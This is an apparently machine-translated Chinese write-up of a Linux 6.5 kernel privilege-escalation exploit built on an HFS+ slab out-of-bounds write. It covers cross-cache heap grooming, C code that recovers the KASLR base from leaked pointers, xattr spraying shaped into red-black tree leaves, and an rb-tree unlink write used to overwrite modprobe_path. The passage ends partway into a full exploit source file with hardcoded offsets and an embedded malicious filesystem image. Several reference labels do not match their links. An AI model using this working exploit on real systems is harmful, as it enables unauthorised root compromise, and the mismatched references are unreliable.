他没有错。事实证明，在拆分 order-2 页块后的 0.2 秒内，我们能够在真实内核上通过实验验证，这是进行跨缓存攻击的最佳时间窗口，该攻击尝试将两个单独的kmem_cacheslab 放置在内存中彼此靠近的位置（kmalloc-1k 和 kmalloc-cg-1k），以便我们的跨缓存 OOB 变得可行。

好的部分是 Knuth 先生的算法针对性能进行了优化，这很有意义，但实际上这对系统是有害的，因为我们只需在我自己的构建上收集一些使用计时侧通道设施检测的统计数据，就可以在生产内核的预期时间窗口内保持在 0.1 秒内。

Slabby内存取证

尽管以下想法很简单，但我从未在漏洞利用或 CTF 解决方案中看到过它。由于我们仍然不能完全确定跨缓存时序，我们将依靠我们读取高达 65k 的能力。鉴于我们试图从 kmalloc-1k 到 kmalloc-cg-1k slab 进行跨缓存，这意味着我们有 8 个完整的 slab 可能会错过，但我们仍然能够读取tty_structs整个内核内存中的喷射数据。

我们知道确切的偏移量吗？不，我们不知道，但实际上我们也不需要知道。

/* Function to search for pointer triples and calculate KASLR base */
voidfind_pointer_triples(uint8_t * buffer, int buffer_size, int * success, uint64_t * kaslr_base_out){
for (int i = 0; i < buffer_size - 8; i++) {
    /* Extract the first pointer */
    uint64_t first_ptr = extract_pointer(buffer, i);

    if (!is_valid_pointer(first_ptr))
      /* Skip invalid pointers */
      continue;

    /* Extract the second pointer at the offset */
    int second_ptr_pos = i + OFFSET_2ND_PTR;

    if (second_ptr_pos + 8 > buffer_size)
      continue;

    uint64_t second_ptr = extract_pointer(buffer, second_ptr_pos);

    if (!is_valid_pointer(second_ptr))
      continue;

    /* Extract the third pointer at the next offset */
    int third_ptr_pos = second_ptr_pos + OFFSET_3RD_PTR - OFFSET_2ND_PTR;

    if (third_ptr_pos + 8 > buffer_size)
      continue;

    uint64_t third_ptr = extract_pointer(buffer, third_ptr_pos);

    if (!is_valid_pointer(third_ptr))
      continue;

    /* Calculate the differences */
    int64_t diff_first = first_ptr - BASE_ADDR_FIRST;
    int64_t diff_second = second_ptr - BASE_ADDR_SECOND;
    int64_t diff_third = third_ptr - BASE_ADDR_THIRD;

    printf("n[+] Pointer triple found at byte offset %x:n", i);
    printf("tFirst pointer: 0x%lx (Difference: 0x%lx)n", first_ptr, diff_first);
    printf("tSecond pointer: 0x%lx (Difference: 0x%lx)n", second_ptr, diff_second);
    printf("tThird pointer: 0x%lx (Difference: 0x%lx)n", third_ptr, diff_third);

    /* If all three differences match, calculate the KASLR base */
    if (diff_first == diff_second && diff_first == diff_third) {
      uint64_t kaslr_base = diff_first + KERNEL_BASE;

      printf("n[+] KASLR base: 0x%lxn", kaslr_base);
      * success = 1;
      * kaslr_base_out = kaslr_base;

      /* Stop once we find the KASLR base */
      return;
    }
  }
}

虽然看起来很简单，但这段代码的目的只是在内核泄漏转储中搜索内核指针查找值。给定的结构tty_struct，使用基本算法找出 KASLR 基数就变得很简单。此时，剩下的就是实现某种更强大的写入原语并升级modprobe_path，因为现在我们知道了我们在内存中的位置。

它非常简单，但实际上它的灵感来自于我长期的英雄 Imre Rad（GCP 黑客名人）在渗透测试实验室工作时编写的一个旧脚本。他的 Perl 脚本能够通过 JTAG 从嵌入式 Linux 设备获取的物理内存转储，并查找内核数据结构，使用类似的基于偏移量的启发式方法和task_structs相关数据恢复完整的进程树，事实证明它在各种场合都非常有用。

通过红黑树进行任意写入

此时，我们已经拥有了开始利用该漏洞的所有基本要素。

我们有一个基地址。此外，我们非常乐意用类似 7/8 的概率在第一次尝试时覆盖任何kmalloc-1k内容。kmalloc-cg-1k

考虑到我们在中经历的所有困难kmalloc-cg-1k，这次对 RIP 控件进行简单的缓存内溢出确实很不错。正如我们之前所讨论的，可以喷射到任意kmem_caches 中的对象已经用完了，但在 6.5 中，我们仍然可以分配simple_xattrs：

/**
 * simple_xattr_alloc - allocate new xattr object
 * @value: value of the xattr object
 * @size: size of @value
 *
 * Allocate a new xattr object and initialize respective members. The caller is
 * responsible for handling the name of the xattr.
 *
 * Return: On success a new xattr object is returned. On failure NULL is
 * returned.
 */
struct simple_xattr * simple_xattr_alloc(constvoid * value, size_t size){
structsimple_xattr * new_xattr;
size_t len;

/* wrap around? */
  len = sizeof( * new_xattr) + size;
if (len < sizeof( * new_xattr))
    returnNULL;

  new_xattr = kvmalloc(len, GFP_KERNEL);
if (!new_xattr)
    returnNULL;

  new_xattr -> size = size;
memcpy(new_xattr -> value, value, size);
return new_xattr;
}

从会计角度来看，这段代码有意义吗？cgroups因为非特权用户可以在内存文件系统上随机分配一堆属性，并将其记在成本上GFP_KERNEL。不，没有意义，所以GFP_KERNEL_ACCOUNT在较新的内核版本中它被改为。

不过，在 Linux 6.5 中，我们仍然可以通过我们的原语kmalloc-1k轻易地破坏这些对象。有多容易？好吧，starlabs 和其他一些人已经证明，tmpfsinode 使用结构存储扩展属性simple_xattr，然后只需轻而易举地覆盖其中一个即可执行取消链接攻击，因为这些是每个 inode链接列表的一部分，没有任何强化。

这在 6.2 中已发生改变，原因如下：https ://github.com/torvalds/linux/commit/3b4c7bc01727e3a465759236eeac03d0dd686da3 。

鉴于：

static inline void
__rb_change_child(struct rb_node *old, struct rb_node *new,
          struct rb_node *parent, struct rb_root *root)
{
    if (parent) {
        if (parent->rb_left == old)
            WRITE_ONCE(parent->rb_left, new);
        else
            WRITE_ONCE(parent->rb_right, new);
    } else
        WRITE_ONCE(root->rb_node, new);
}

和调用上下文，很容易让人想到一种类似于链表解链攻击的红黑树解链攻击。实际上，我们总是可以确保使用一堆攻击者控制的节点和扩展属性来实现某种内存损坏。

不过，最好的做法是意识到在 kmalloc-1k 上，喷射 16 个对象足以饱和至少一个kmem_cacheslab。红黑树在内存中的布局方式，我在本文中真正开创的简单小想法如下。

计算需要喷射多少个对象simple_xattrs以及喷射到哪个 kmalloc 缓存中（例如，在中kmalloc-1k，单个 slab 上可以容纳 8 个对象）
确保你可以simple_xattrs使用 OOB 或 UAF 原语轻松进行覆盖

假设有人simple_xattrs从用户空间分配了 16 个，这将导致其中 8 个最终进入某个未使用的 slab，而另外 8 个进入我们的 CPU 主 slab。到目前为止，这是可以接受的行为，但是如果我们能够在其中分配一些易受攻击的对象，kmem_cache,我们就可以覆盖最后分配的 8 个对象之一kmalloc-1k。现在，这通常意味着在 15 个节点的红黑树中，一个变量被迫采用一个随机节点。

好吧，我们不知道是哪一个，所以如果我们不小心以各种非常糟糕的方式破坏树，我们就有可能在几次尝试后彻底崩溃内核。

现在，我确信我最喜欢的数学家保罗·埃尔多斯 (Paul Erdos)很乐意花时间研究这个普遍问题，即如果你给出一棵随机的红黑树及其中随机选择的节点，并开始询问有关所得到的结构的算法问题，那么会发生什么有趣的事情。

因为与那家伙相比，我们完全是笨蛋，所以我们要做的就是按顺序分配一堆节点，以便我们最后 8 个分配恰好是我们的写入原语可以覆盖的有趣分配 - 因此我们以这样的方式分配它们，它们恰好是红黑树底部的 8 个红色叶子节点。怎么做？好吧，只需基本的 Python 就可以告诉你这是可行的：

voidspray_xattr(void)
{
    char xattr_name[XATTR_NAME_MAX_SIZE];
    char xattr_value[XATTR_NAME_MAX_SIZE];

    int base_nodes[] = {7, 3, 11, 1, 5, 9, 13};
    int leaf_nodes[] = {0, 2, 4, 6, 8, 10, 12, 14};
    int base_size = sizeof(base_nodes) / sizeof(base_nodes[0]);
    int leaf_size = sizeof(leaf_nodes) / sizeof(leaf_nodes[0]);

    for (int i = 100; i < 111; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", i, i);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%d", i);
        setxattr("/tmp/tmpfs/xattr_node_3", xattr_name, xattr_value, strlen(xattr_value), 0);
    }


    for (int i = 0; i < base_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", base_nodes[i], base_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", base_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node", xattr_name, xattr_value, strlen(xattr_value), 0);
    }

    for (int i = 0; i < leaf_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", leaf_nodes[i], leaf_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", leaf_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node", xattr_name, xattr_value, strlen(xattr_value), 0);
    }

}

当我开始研究这个问题的时候，我对数据结构的知识还很生疏，所以如果你想知道它为什么有效，下面就是它的要点。

红黑树属性回顾

每个节点要么是红色，要么是黑色。
根部始终是黑色的。
红色节点不能有红色子节点（即，任何路径上都没有两个连续的红色节点）。
从一个节点到其后代空节点的每条路径必须具有相同数量的黑色节点，称为黑高度。

现在，让我们分析一下删除一片红叶时会发生什么：

去除叶子不会影响黑色高度：

红叶没有子节点，移除它不会影响到空节点的任何路径上的黑节点。因此，所有路径的黑高保持不变，保持该不变量。

没有红色父节点的红色节点：

根据属性 3，红色节点不能有红色父节点，因此删除红色叶子并不违反有关连续红色节点的规则。红色父节点（如果存在）要么是黑色，要么红色叶子本身就是没有父节点的根，在这种情况下不会出现这种情况。

插入顺序看起来有些随机，但实际上有多种选择。编写更多 Python 代码后，我们使用一个简单的Tk画布来可视化在分配这些扩展属性时内核中的数据结构内部发生的情况：

这样，我们就避免了在擦除调用期间进行所有粗略的树旋转，因为这些旋转肯定会弄乱我们的指针并导致未处理的页面错误和内核崩溃。此类操作是有问题的（/lib/rbtree.c#L227）：

static __always_inline void
____rb_erase_color(struct rb_node *parent, struct rb_root *root,
    void (*augment_rotate)(struct rb_node *old, struct rb_node *new))
{
    struct rb_node *node = NULL, *sibling, *tmp1, *tmp2;

while (true) {
    /*
     * Loop invariants:
     * - node is black (or NULL on first iteration)
     * - node is not the root (parent is not NULL)
     * - All leaf paths going through parent and node have a
     * black node count that is 1 lower than other leaf paths.
     */
    sibling = parent->rb_right;
    if (node != sibling) { /* node == parent->rb_left */
        if (rb_is_red(sibling)) {
            /*
             * Case 1 - left rotate at parent
             *
             * P S
             * /  / 
             * N s --> p Sr
             * /  / 
             * Sl Sr N Sl
             */
            tmp1 = sibling->rb_left;
            WRITE_ONCE(parent->rb_right, tmp1);
            WRITE_ONCE(sibling->rb_left, parent);
            rb_set_parent_color(tmp1, parent, RB_BLACK);
            __rb_rotate_set_parents(parent, sibling, root,
                        RB_RED);
            augment_rotate(parent, sibling);
            sibling = tmp1;
        }

一旦完成，我们就可以进行几乎任意的写入。

升级

正如我们上面看到的，与取消链接攻击类似，我们有类似*ptr1->field = ptr2和的东西*ptr2->field2 = ptr1。

正如starlabs 文章指出的那样：

Unfortunately, `next` is written to `prev` in line2. This means that `prev` must bea valid pointer as well. This poses a significant restriction on the values that we can writeto `next`. However, we can take advantage of the physmap to provide valid `prev` values.

The physmap isa region of kernel virtual memory where physical memory pages are mapped contiguously. For example, ifa machine has4GiB (2^32 bytes) of memory, 32 bits (4 bytes) are required to address each byte of physical memory available in the system. Assuming the physmap starts at 0xffffffff00000000, any address from 0xffffffff00000000 to0xffffffffffffffff will be valid as every value (from 0x00000000-0xffffffff) of the lower 4 bytes are required to address memory.

在我们的例子中，我们使用的代码如下include/linux/rbtree_augmented.h：

static __always_inline struct rb_node *
__rb_erase_augmented(struct rb_node *node, struct rb_root *root,
             const struct rb_augment_callbacks *augment)
{
    struct rb_node *child = node->rb_right;
    struct rb_node *tmp = node->rb_left;
    struct rb_node *parent, *rebalance;
    unsigned long pc;

    if (!tmp) {
        /*
         * Case 1: node to erase has no more than 1 child (easy!)
         *
         * Note that if there is one child it must be red due to 5)
         * and node must be black due to 4). We adjust colors locally
         * so as to bypass __rb_erase_color() later on.
         */
        pc = node->__rb_parent_color;
        parent = __rb_parent(pc);
        __rb_change_child(node, child, parent, root);
        if (child) {
            child->__rb_parent_color = pc;
            rebalance = NULL;
        } else
            rebalance = __rb_is_black(pc) ? parent : NULL;
        tmp = parent;
    } elseif (!child) {
        /* Still case 1, but this time the child is node->rb_left */
        tmp->__rb_parent_color = pc = node->__rb_parent_color;
        parent = __rb_parent(pc);
        __rb_change_child(node, tmp, parent, root);
        rebalance = NULL;
        tmp = parent;

在中，__rb_change_child我们用子指针覆盖父指针，如上所述。但是，如果子指针不为空，我们还必须处理child->__rb_parent_color = pc;。也就是说，我们希望通过将子指针映射到有效范围（0xfff888..）来执行 physmap 技巧，并仅在地址的低位引入 ASCII 字符。但是有一个问题。当我第一次在 gdb 中尝试此操作时，我的所有写入操作看起来都是 4/8 字节对齐的。

与大多数安全研究人员一样，尽管我整天都习惯于查看汇编或反编译的 Ghidra 列表，但实际上我很难理解 C 代码，因为它是用花哨的关键字和编译器指令编写的，所以首先我怀疑这是问题所在：

structrb_node {
    unsignedlong  __rb_parent_color;
    structrb_node *rb_right;
    structrb_node *rb_left;
} __attribute__((aligned(sizeof(long))));
    /* The alignment might seem pointless, but allegedly CRIS needs it */

尽管我之前利用过 ROP 链漏洞，但这次还是很可怕，因为我真的很想让这个 modprobe 攻击成功。这很可怕，因为 8 字节对齐可能会阻止我重复使用这个想法。为什么？原因很平凡。这是因为变量的原始值是，而我们只能控制有效载荷地址中的 4 个字节。如果我们只能写入一些垃圾/sbin/modprobe，我们如何将此路径覆盖为攻击者可控制的内容？Starlabs 的解决方案是将前导斜杠保留在 /sbin 中，并将写入 off-bye-one 定位到该位置。看看这是怎么回事？如果我们只能在 8 字节边界处写入，我们就有麻烦了。幸运的是，对齐写入的原因不是由于，而是由于更简单的东西，即这个 __rb_parent 宏：/tmp/foldertmp/__attribute__((aligned(sizeof(long))))

#define__rb_parent(pc) ((struct rb_node *)(pc & ~3))

#define__rb_color(pc) ((pc) & 1)
#define__rb_is_black(pc) __rb_color(pc)
#define__rb_is_red(pc) (!__rb_color(pc))

上面的代码片段中调用了它。其思想是父指针的低位存储节点的颜色，其余部分用作实际指针。幸运的是，它只有 32 位对齐。因此，我们可以分两步执行攻击，首先用覆盖开头的路径/tmp，然后将指针再移动 4 个字节，然后写入/bgp或我们喜欢的其他内容。最后，漏洞利用就结束了。一旦modprobe重定向到我们控制的文件，利用就变得微不足道了：

事实已经证明。

参考

Mac OS X 概述– https://en.wikipedia.org/wiki/Mac_OS_X

Apple 文件系统简介– https://en.wikipedia.org/wiki/Apple_File_System

macOS High Sierra 信息– https://en.wikipedia.org/wiki/MacOS_High_Sierra

Apple 的 HFS Plus 文件系统文档– https://developer.apple.com/library/archive/technotes/tn/tn1150.html

HFS Plus 结构研究– https://dl.acm.org/doi/pdf/10.1145/3391202

LWN 文章调查内核漏洞– https://lwn.net/Articles/652468/

内核漏洞记录后续内容– https://lwn.net/Articles/652472/

Linux 内核提交：kmalloc-cg-* 简介– https://github.com/torvalds/linux/commit/494c1dfe855ec1f70f89552fce5eadf4a1717552

Linux 中 GFP_KERNEL_ACCOUNT 的定义– https://elixir.bootlin.com/linux/v6.5/C/ident/GFP_KERNEL_ACCOUNT

探索 Linux 的随机 kmalloc 缓存– https://sam4k.com/exploring-linux-random-kmalloc-caches/#introducing-random-kmalloc-caches

Linux 提交尝试终止缓存– https://github.com/torvalds/linux/commit/734bbc1c97ea7e46e0e53b087de16c87c03bd65f

Linux 安全峰会关于内核漏洞的讨论- https://www.youtube.com/watch?v=2hYzxsWeNcE&ab_channel=TheLinuxFoundation

KASLR（内核地址空间布局随机化） – https://lwn.net/Articles/569635/

通过 execve 调用提升权限– https://sam4k.com/like-techniques-modprobe_path/

Linux 源代码：fs/hfsplus/hfsplus_raw.h – https://github.com/torvalds/linux/blob/master/fs/hfsplus/hfsplus_raw.h

setxattr 系统调用的 Linux 手册页– https://man7.org/linux/man-pages/man2/setxattr.2.html

有关 HFS Plus 已知问题的文章– https://etenal.me/archives/1825

平板分配器弹性研究- https://dl.acm.org/doi/10.1145/3372297.3423353

pahole 检查结构填充的工具– https://linux.die.net/man/1/pahole

查克·诺里斯笑话 API – https://api.chucknorris.io/jokes/etd9c1v9smqxo2xonfm2lq

内核漏洞：tty_struct文档– https://github.com/smallkirby/kernelpwn/blob/master/structs.md#tty_struct

内核漏洞：tty_file_private文档– https://github.com/smallkirby/kernelpwn/blob/master/structs.md#tty_file_private

内核漏洞：poll_list, pollfd文档– https://github.com/smallkirby/kernelpwn/blob/master/structs.md#poll_list

内核漏洞：user_key_payload文档- https://github.com/smallkirby/kernelpwn/blob/master/structs.md#user_key_payload

内核漏洞：setxattr文档– https://github.com/smallkirby/kernelpwn/blob/master/structs.md#_setxattr

内核漏洞：seq_operations文档– https://github.com/smallkirby/kernelpwn/blob/master/structs.md#seq_operations

内核漏洞：subprocess_info文档– https://github.com/smallkirby/kernelpwn/blob/master/structs.md#subprocess_info

关于杀死内核对象的讨论– https://lwn.net/Articles/944647/

SLUB 分配器安全论文– https://www.usenix.org/system/files/usenixsecurity24-maar-slubstick.pdf

了解 Linux 内核内存分配器– https://www.kernel.org/doc/gorman/html/understand/understand009.html

摄影师的个人网站– https://creation.etenal.me/

modprobe_path 概述– https://hu.wikipedia.org/wiki/Erd%C5%91s_P%C3%A1l

2021 年 GCP VRP 奖获奖者– https://security.googleblog.com/2022/06/announcing-winners-of-2021-gcp-vrp-prize.html

内核结构中的链表行为– https://starlabs.sg/blog/2022/06-io_uring-new-code-new-bugs-and-a-new-exploit-technique/

数学家保罗·埃尔多斯的传记– https://hu.wikipedia.org/wiki/Erd%C5%91s_P%C3%A1l

starlabs：利用 io_uring 漏洞- https://starlabs.sg/blog/2022/06-io_uring-new-code-new-bugs-and-a-new-exploit-technique/

EXP:

/*
 * exploit.c
 *
 * Attila Szasz <[email protected]>
 * @4ttil4sz1a
 *
 * Exploit for hfs+ slab out of bounds write
 * targeting Linux kernel 6.5
 *
 */

#define _GNU_SOURCE

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
#include <stdint.h>
#include <unistd.h>
#include <sched.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/xattr.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <sys/shm.h>
#include <linux/keyctl.h>
#include <stdint.h>
#include <stdbool.h>
#include <time.h>
#include <zlib.h>
#include <endian.h>
#include <stdint.h>
#include <linux/types.h>
#include <errno.h>
#include <sys/mount.h>
#include <pwd.h>
#include <grp.h>
#include <semaphore.h>


#define KEY_DESC_MAX_SIZE 900
#define XATTR_NAME_MAX_SIZE 1024
#define MODPROBE_PATH "/proc/sys/kernel/modprobe"
#define BUFFER_SIZE 256

/*
#define DEBUG_CROSSCACHE 1
*/

/* see security/keys/key.c */
#define SPRAY_KEY_SIZE 13
#define SPRAY_KEY_SIZE_INIT 6
#define SPRAY_TTY_INITIAL 6
#define SPRAY_TTY_SIZE 9
#define SPRAY_XATTR_SIZE_MODPROBE 15

#define do_error_exit(msg) do {perror("[-] " msg); exit(EXIT_FAILURE); } while (0)

#define KERNEL_BASE_LOWER 0xffffffff80000000
#define KERNEL_BASE_UPPER 0xffffffffc0000000

#define OFFSET_2ND_PTR 0x230
#define OFFSET_3RD_PTR (OFFSET_2ND_PTR + (0x60))

#define BASE_ADDR_FIRST 0xffffffff82284be0
#define BASE_ADDR_SECOND 0xffffffff81631bc0
#define BASE_ADDR_THIRD 0xffffffff81633e30

#define MODPROBE_ADDR_ONE 0xffffffff82b3f638
#define MODPROBE_ADDR_TWO 0xffffffff82b3f63c

#define KERNEL_BASE 0xffffffff81000000

#define PIPE_SPRAY_NUM 20

#define PGV_1PAGE_SPRAY_NUM 0x100

#define PGV_4PAGES_START_IDX PGV_1PAGE_SPRAY_NUM
#define PGV_4PAGES_SPRAY_NUM 0x100

#define PGV_8PAGES_START_IDX (PGV_4PAGES_START_IDX + PGV_4PAGES_SPRAY_NUM)
#define PGV_8PAGES_SPRAY_NUM 0x100

int pgv_1page_start_idx;
int pgv_4pages_start_idx = PGV_4PAGES_START_IDX;
int pgv_8pages_start_idx = PGV_8PAGES_START_IDX;

uint64_t kaslr_base_recovered;

#define PGV_PAGE_NUM 1000
#define PACKET_VERSION 10
#define PACKET_TX_RING 13

struct tpacket_req {
    unsigned int tp_block_size;
    unsigned int tp_block_nr;
    unsigned int tp_frame_size;
    unsigned int tp_frame_nr;
};

/* Each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
    int idx;
    int cmd;
    unsigned int size;
    unsigned int nr;
};

/* Operations type */
enum {
    CMD_ALLOC_PAGE,
    CMD_FREE_PAGE,
    CMD_EXIT,
};

/* Tpacket version for setsockopt */
enum tpacket_versions {
    TPACKET_V1,
    TPACKET_V2,
    TPACKET_V3,
};

typedef int32_t key_serial_t;

#define CHUNK 16384

#define __packed __attribute__((packed))

#define HFSPLUS_ATTR_MAX_STRLEN 127

typedef __be32 hfsplus_cnid;
typedef __be16 hfsplus_unichr;
typedef __u32 u32;
typedef __u16 u16;
typedef __u8 u8;
typedef __s8 s8;

struct write4_payload {
    void *next;
    void *prev;
    uint8_t name_offset;
} __attribute__((packed));

uint64_t get_keyring_leak(key_serial_t *id_buffer, uint32_t id_buffer_size);

void release_keys(key_serial_t *id_buffer, uint32_t id_buffer_size);

static inline key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid)
{
    return syscall(__NR_add_key, type, description, payload, plen, ringid);
}

static inline long keyctl(int operation, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5)
{
    return syscall(__NR_keyctl, operation, arg2, arg3, arg4, arg5);
}

void set_cpu_affinity(int cpu_n, pid_t pid);

void spray_tty_struct(int num);

key_serial_t *spray_keyring(uint32_t spray_size, uint32_t offset);


struct hfsplus_attr_unistr {
    __be16 length;
    hfsplus_unichr unicode[HFSPLUS_ATTR_MAX_STRLEN];
} __packed;

/* HFS+ attributes tree key */
struct hfsplus_attr_key {
    __be16 key_len;
    __be16 pad;
    hfsplus_cnid cnid;
    __be32 start_block;
    struct hfsplus_attr_unistr key_name;
} __packed;

#define HFSPLUS_ATTR_KEYLEN sizeof(struct hfsplus_attr_key)

/* A single contiguous area of a file */
struct hfsplus_extent {
    __be32 start_block;
    __be32 block_count;
} __packed;
typedef struct hfsplus_extent hfsplus_extent_rec[8];

/* Information for a "Fork" in a file */
struct hfsplus_fork_raw {
    __be64 total_size;
    __be32 clump_size;
    __be32 total_blocks;
    hfsplus_extent_rec extents;
} __packed;

/* HFS+ Volume Header */
struct hfsplus_vh {
    __be16 signature;
    __be16 version;
    __be32 attributes;
    __be32 last_mount_vers;
    u32 reserved;

    __be32 create_date;
    __be32 modify_date;
    __be32 backup_date;
    __be32 checked_date;

    __be32 file_count;
    __be32 folder_count;

    __be32 blocksize;
    __be32 total_blocks;
    __be32 free_blocks;

    __be32 next_alloc;
    __be32 rsrc_clump_sz;
    __be32 data_clump_sz;
    hfsplus_cnid next_cnid;

    __be32 write_count;
    __be64 encodings_bmp;

    u32 finder_info[8];

    struct hfsplus_fork_raw alloc_file;
    struct hfsplus_fork_raw ext_file;
    struct hfsplus_fork_raw cat_file;
    struct hfsplus_fork_raw attr_file;
    struct hfsplus_fork_raw start_file;
} __packed;


/* HFS+ BTree node descriptor */
struct hfs_bnode_desc {
    __be32 next;
    __be32 prev;
    s8 type;
    u8 height;
    __be16 num_recs;
    u16 reserved;
} __packed;

/* HFS+ BTree node types */
#define HFS_NODE_INDEX 0x00 /* An internal (index) node */
#define HFS_NODE_HEADER 0x01 /* The tree header node (node 0) */
#define HFS_NODE_MAP 0x02 /* Holds part of the bitmap of used nodes */
#define HFS_NODE_LEAF 0xFF /* A leaf (ndNHeight==1) node */

/* HFS+ BTree header */
struct hfs_btree_header_rec {
    __be16 depth;
    __be32 root;
    __be32 leaf_count;
    __be32 leaf_head;
    __be32 leaf_tail;
    __be16 node_size;
    __be16 max_key_len;
    __be32 node_count;
    __be32 free_nodes;
    u16 reserved1;
    __be32 clump_size;
    u8 btree_type;
    u8 key_type;
    __be32 attributes;
    u32 reserved3[16];
} __packed;

#define HFS_TREE_BIGKEYS 2
#define HFS_TREE_VARIDXKEYS 4


/* Gzipped vanilla HFS+ that we are going to corrupt */
unsigned char vanilla_hfs_bin[] = {
  0x1f, 0x8b, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x5d, 0x90,
  0x79, 0x54, 0x12, 0x06, 0x00, 0xc6, 0xc1, 0xca, 0xb9, 0xe9, 0x6c, 0x79,
  0x65, 0xb4, 0xe4, 0xe5, 0xc9, 0x4c, 0xd3, 0xcc, 0x7c, 0x6a, 0xa5, 0x5b,
  0x4c, 0x4b, 0x9c, 0x4f, 0x53, 0xf7, 0x3c, 0x40, 0xb7, 0x28, 0x73, 0xa4,
  0x50, 0x1e, 0x80, 0x07, 0x1e, 0xaf, 0x56, 0x21, 0x4d, 0xe9, 0x52, 0xd3,
  0x54, 0x40, 0x43, 0x49, 0xc4, 0x32, 0x52, 0x1a, 0x82, 0x69, 0x86, 0x28,
  0x1e, 0x25, 0x79, 0x2b, 0xa0, 0x79, 0xe0, 0x81, 0x52, 0x98, 0x47, 0x5e,
  0xec, 0xad, 0xf7, 0xb6, 0xb4, 0xef, 0xdf, 0xdf, 0x1f, 0xdf, 0xef, 0xfb,
  0xc0, 0x37, 0xb4, 0x00, 0x9f, 0xb2, 0x6d, 0x76, 0x08, 0xee, 0x17, 0x88,
  0x05, 0x08, 0xdf, 0x67, 0x3e, 0x95, 0x18, 0xdb, 0xfd, 0x40, 0x32, 0x22,
  0xfe, 0x05, 0x31, 0xb8, 0x36, 0x40, 0xb5, 0x1f, 0x8e, 0xa0, 0x82, 0x74,
  0xaa, 0xf3, 0x03, 0xdf, 0x35, 0x69, 0xdd, 0x45, 0x12, 0x21, 0xa6, 0x15,
  0x1a, 0x97, 0xd3, 0xf5, 0xa4, 0xb8, 0x67, 0xf7, 0x46, 0xfe, 0xdc, 0x4e,
  0x32, 0xa5, 0x69, 0x19, 0x13, 0x2b, 0x5f, 0x58, 0xfb, 0x73, 0x4d, 0x8d,
  0xf5, 0x68, 0x5a, 0x2f, 0xc6, 0x40, 0xa0, 0xa5, 0xc1, 0x58, 0xa6, 0xe4,
  0x9c, 0x90, 0x53, 0x74, 0xa1, 0xcc, 0xe5, 0xcd, 0x87, 0xf5, 0x63, 0x85,
  0x79, 0x71, 0x13, 0x6d, 0x4b, 0x05, 0x72, 0xd9, 0x5a, 0x99, 0xc9, 0xed,
  0x53, 0xe2, 0xcb, 0x4d, 0xd1, 0x7a, 0x7c, 0x85, 0x92, 0x2f, 0x88, 0x84,
  0x53, 0xd5, 0x4d, 0xdf, 0x16, 0xb9, 0xd5, 0xd5, 0x6a, 0x68, 0xa4, 0xd0,
  0xd9, 0x1a, 0x7c, 0x3c, 0x29, 0xf4, 0x82, 0x12, 0x13, 0x3e, 0x72, 0xec,
  0xa7, 0xa1, 0xbe, 0x61, 0x4a, 0xb6, 0x92, 0xe7, 0x42, 0x85, 0xe1, 0xd2,
  0x72, 0x86, 0x18, 0x8e, 0x96, 0x6d, 0xa9, 0x39, 0x27, 0x5f, 0x1d, 0x95,
  0x5b, 0x16, 0xd8, 0x9b, 0x18, 0xc0, 0x15, 0x41, 0x16, 0x0a, 0x29, 0x07,
  0x62, 0xd9, 0x1c, 0x37, 0xed, 0xd8, 0x92, 0x70, 0x80, 0xae, 0x88, 0x6d,
  0x23, 0x8a, 0xc5, 0x76, 0x07, 0x9d, 0x88, 0x67, 0xd1, 0xac, 0x39, 0xe7,
  0x3e, 0x6b, 0x7a, 0x46, 0x71, 0xdd, 0xf4, 0x75, 0x9f, 0xa8, 0x01, 0x5f,
  0xf8, 0x75, 0xc8, 0x04, 0xa5, 0x35, 0x24, 0xad, 0xaa, 0x8f, 0xcd, 0xc0,
  0x35, 0x9f, 0xf1, 0x11, 0xc3, 0x42, 0x56, 0x48, 0xe3, 0x2e, 0x74, 0xaf,
  0x22, 0x18, 0x96, 0x55, 0x3e, 0xbd, 0xbb, 0x77, 0xdb, 0x0e, 0x9a, 0xc9,
  0xfc, 0x00, 0x39, 0x37, 0x9b, 0xbc, 0xef, 0x9b, 0xc3, 0x5e, 0xf9, 0x6a,
  0xe7, 0x28, 0x41, 0x7b, 0x17, 0x07, 0xa7, 0x83, 0xc2, 0xec, 0x8e, 0x7e,
  0x1e, 0x33, 0x8e, 0xae, 0xad, 0x69, 0x60, 0xde, 0xc8, 0x4d, 0x65, 0x8b,
  0xce, 0x77, 0x06, 0xdf, 0x3a, 0x15, 0x30, 0x35, 0x7e, 0x6c, 0xaa, 0xa2,
  0x89, 0xfa, 0xb8, 0xc3, 0xf7, 0x10, 0xdc, 0x5c, 0x0f, 0x75, 0x9c, 0x19,
  0x24, 0x5f, 0x5d, 0x76, 0x2f, 0x94, 0x82, 0x56, 0x5e, 0xf3, 0xf0, 0xa5,
  0xc9, 0x9e, 0xc9, 0x09, 0xb4, 0xd5, 0x9a, 0x69, 0xaf, 0x57, 0x17, 0x3d,
  0xf2, 0xe3, 0x11, 0xb0, 0xcc, 0x9b, 0xee, 0xc1, 0x83, 0xb5, 0x7e, 0xdb,
  0x87, 0xd5, 0xe6, 0xb1, 0x90, 0x94, 0x96, 0x01, 0x61, 0xdc, 0xce, 0x45,
  0x6b, 0xe8, 0xac, 0xa4, 0x92, 0xd1, 0x03, 0x6e, 0xce, 0x1b, 0xe9, 0x63,
  0x66, 0x55, 0xcb, 0xe2, 0x46, 0x33, 0x08, 0x58, 0x65, 0xf3, 0x6e, 0xdf,
  0x44, 0xbe, 0xf5, 0x3e, 0x02, 0xce, 0xd2, 0x65, 0x10, 0x7b, 0xa6, 0xb4,
